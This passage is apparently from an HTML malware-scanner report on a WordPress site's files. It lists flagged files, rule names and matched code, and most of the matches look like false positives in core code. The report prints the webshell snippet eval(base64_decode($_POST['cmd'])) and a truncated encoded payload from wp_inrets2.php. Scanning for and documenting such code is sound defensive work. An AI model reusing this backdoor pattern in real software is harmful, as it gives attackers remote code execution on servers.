#0000BB">getUserInfo</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">userinfo</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getDebugInfo</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">getUserInfo</span><span style="color: #007700">();&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getBacktrace</span><span style="color: #007700">(</span><span style="color: #0000BB">$frame&nbsp;</span><span style="color: #007700">=&nbsp;...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_88").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/first/first/testsql.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.90 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:59</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:34</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 3</span><br><table id="file_89" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$tmp2</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$tmp1</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 205</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$tmp</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_89").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp_inrets2.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 37.33 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:04</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_90" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'eF7svXt/20auMPz/8/s932GidY+kRBdfcmmdOoljK42fdWzXVtqeE2f10hJlc0OJKkn50k3OZ38BzJ0cUpTt9LRny93GNjmDwWAwGAwGA7wKpsEg8dNG3Y/jKB6E0Xm9xQ7e7+83n//f//NKfYX3AyqRwOdV+9vEC8KONxoNrgcXvjfy43wR/3oWJf5gdjGrtyrUrkfjcb0YguszYR/7syhOg+l5HoNRkMxC7ybTiZUoHAHIxA/HbIutDE56xz/1jj/Uj94ewe/7b+ofRaHYn0QpoDeKrXLHvXeH/d5ge3f3mIpCYQcMqFLr1p6bH62KFkj+U4Mchl6SsJN3/SP2r//7fxg83YcP+S/sIeMfEj++9GOGnddfXl16MQum6k2X/zKbn4XBkK1gxcHR4XEfWl9/Qri7gQNRwxsWBlOf+dMREJc1RtG0nrLhhTc995uZFpM0hjIFje4c779BapzGp9NaQZt+mrCrCz+9gB6N/LP5+Tm2GSQ...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'body'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'eF7svXt/20auMPz/8/s932GidY+kRBdfcmmdOoljK42fdWzXVtqeE2f10hJlc0OJKkn50k3OZ38BzJ0cUpTt9LRny93GNjmDwWAwGAwGA7wKpsEg8dNG3Y/jKB6E0Xm9xQ7e7+83n//f//NKfYX3AyqRwOdV+9vEC8KONxoNrgcXvjfy43wR/3oWJf5gdjGrtyrUrkfjcb0YguszYR/7syhOg+l5HoNRkMxC7ybTiZUoHAHIxA/HbIutDE56xz/1jj/Uj94ewe/7b+ofRaHYn0QpoDeKrXLHvXeH/d5ge3f3mIpCYQcMqFLr1p6bH62KFkj+U4Mchl6SsJN3/SP2r//7fxg83YcP+S/sIeMfEj++9GOGnddfXl16MQum6k2X/zKbn4XBkK1gxcHR4XEfWl9/Qri7gQNRwxsWBlOf+dMREJc1RtG0nrLhhTc995uZFpM0hjIFje4c779Bapz...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_90").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-admin/includes/class-wp-filesystem-ssh2.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 21.21 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_91" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$owneruid&nbsp;</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$ownerarray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">getchmod</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">decoct</span><span style="color: #007700">(&nbsp;@</span><span style="color: #0000BB">fileperms</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">sftp_path</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">)&nbsp;)&nbsp;),&nbsp;-</span><span style="color: #0000BB">3&nbsp;</span><span style="color: #007700">);&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">group</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">=&nbsp;@</span><span style="color: #0000BB">filegroup</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">sftp_path</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">)&nbsp;);&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'posix_getgrgid'&nbsp;</span><span style="color: #007700">)&nbsp;)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$gid</span><span style="color: #007700">;&nbsp;}&nbsp;</span><span style="color: #0000BB">$grouparray&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">posix_getgrgid</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$grouparray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">copy</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$source</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$destination</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$overwrite&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$mode&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false&nbsp;</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(&nbsp;...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_91").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-admin/includes/file.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 92.41 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_92" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$overrides</span><span style="color: #007700">[</span><span style="color: #DD0000">'upload_error_handler'</span><span style="color: #007700">](&amp;</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$message&nbsp;</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_92").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-admin/includes/class-pclzip.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 191.21 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_93" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2780</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3702</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3948</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5677</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_93").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-admin/includes/class-wp-filesystem-direct.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 16.02 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_94" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$owneruid&nbsp;</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$ownerarray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">getchmod</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">decoct</span><span style="color: #007700">(&nbsp;@</span><span style="color: #0000BB">fileperms</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">)&nbsp;),&nbsp;-</span><span style="color: #0000BB">3&nbsp;</span><span style="color: #007700">);&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">group</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">=&nbsp;@</span><span style="color: #0000BB">filegroup</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">);&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'posix_getgrgid'&nbsp;</span><span style="color: #007700">)&nbsp;)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$gid</span><span style="color: #007700">;&nbsp;}&nbsp;</span><span style="color: #0000BB">$grouparray&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">posix_getgrgid</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$grouparray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">copy</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$source</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$destination</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$overwrite&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$mode&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false&nbsp;</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$overwrite&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">exists</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$destinat</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_94").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-admin/includes/ms.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 33.96 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_95" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function str_rot13 eval_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 562</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">riny</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_95").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp-admin/includes/class-wp-debug-data.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 43.17 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:44</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_96" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit php_uname <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 553</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'m'&nbsp;</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'gs&nbsp;--version'&nbsp;</span><span style="color: #007700">);&nbsp;if&nbsp;(&nbsp;empty(&nbsp;</span><span style="color: #0000BB">$gs&nbsp;</span><span style="color: #007700">)&nbsp;)&nbsp;{&nbsp;</span><span style="color: #0000BB">$gs&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$not_available</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$gs_debug&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'not&nbsp;available'</span><span style="color: #007700">;&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$gs_debug&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$gs</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$gs&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">__</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'Unable&nbsp;to&nbsp;determine&nbsp;if&nbsp;Ghostscript&nbsp;is&nbsp;installed'&nbsp;</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$gs_debug&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'unknown'</span><span style="color: #007700">;&nbsp;}&nbsp;</span><span style="color: #0000BB">$info</span><span style="color: #007700">[</span><span style="color: #DD0000">'wp-media'</span><span style="color: #007700">][</span><span style="color: #DD0000">'fields'</span><span style="color: #007700">][</span><span style="color: #DD0000">'ghostscript_version'</span><span style="color: #007700">]&nbsp;=&nbsp;array(&nbsp;</span><span style="color: #DD0000">'label'&nbsp;</span><span style="color: #007700">=&gt;&nbsp;</span><span style="color: #0000BB">__</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'Ghostscript&nbsp;version'&nbsp;</span><span style="color: #007700">),&nbsp;</span><span style="color: #DD0000">'value'&nbsp;</span><span style="color: #007700">=&gt;&nbsp;</span><span style="color: #0000BB">$gs</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'debug'&nbsp;</span><span style="color: #007700">=&gt;&nbsp;</span><span style="color: #0000BB">$gs_debug</span><span style="color: #007700">,&nbsp;);&nbsp;if&nbsp;(&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'php_uname'&nbsp;</span><span style="color: #007700">)&nbsp;)&nbsp;{&nbsp;</span><span style="color: #0000BB">$server_architecture&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">sprintf</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'%s&nbsp;%s&nbsp;%s'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">php_uname</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'s'&nbsp;</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">php_uname</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'r'&nbsp;</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">php_uname</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'m'&nbsp;</span><span style="color: #007700">)&nbsp;...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 653</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">SUHOSIN</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 654</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
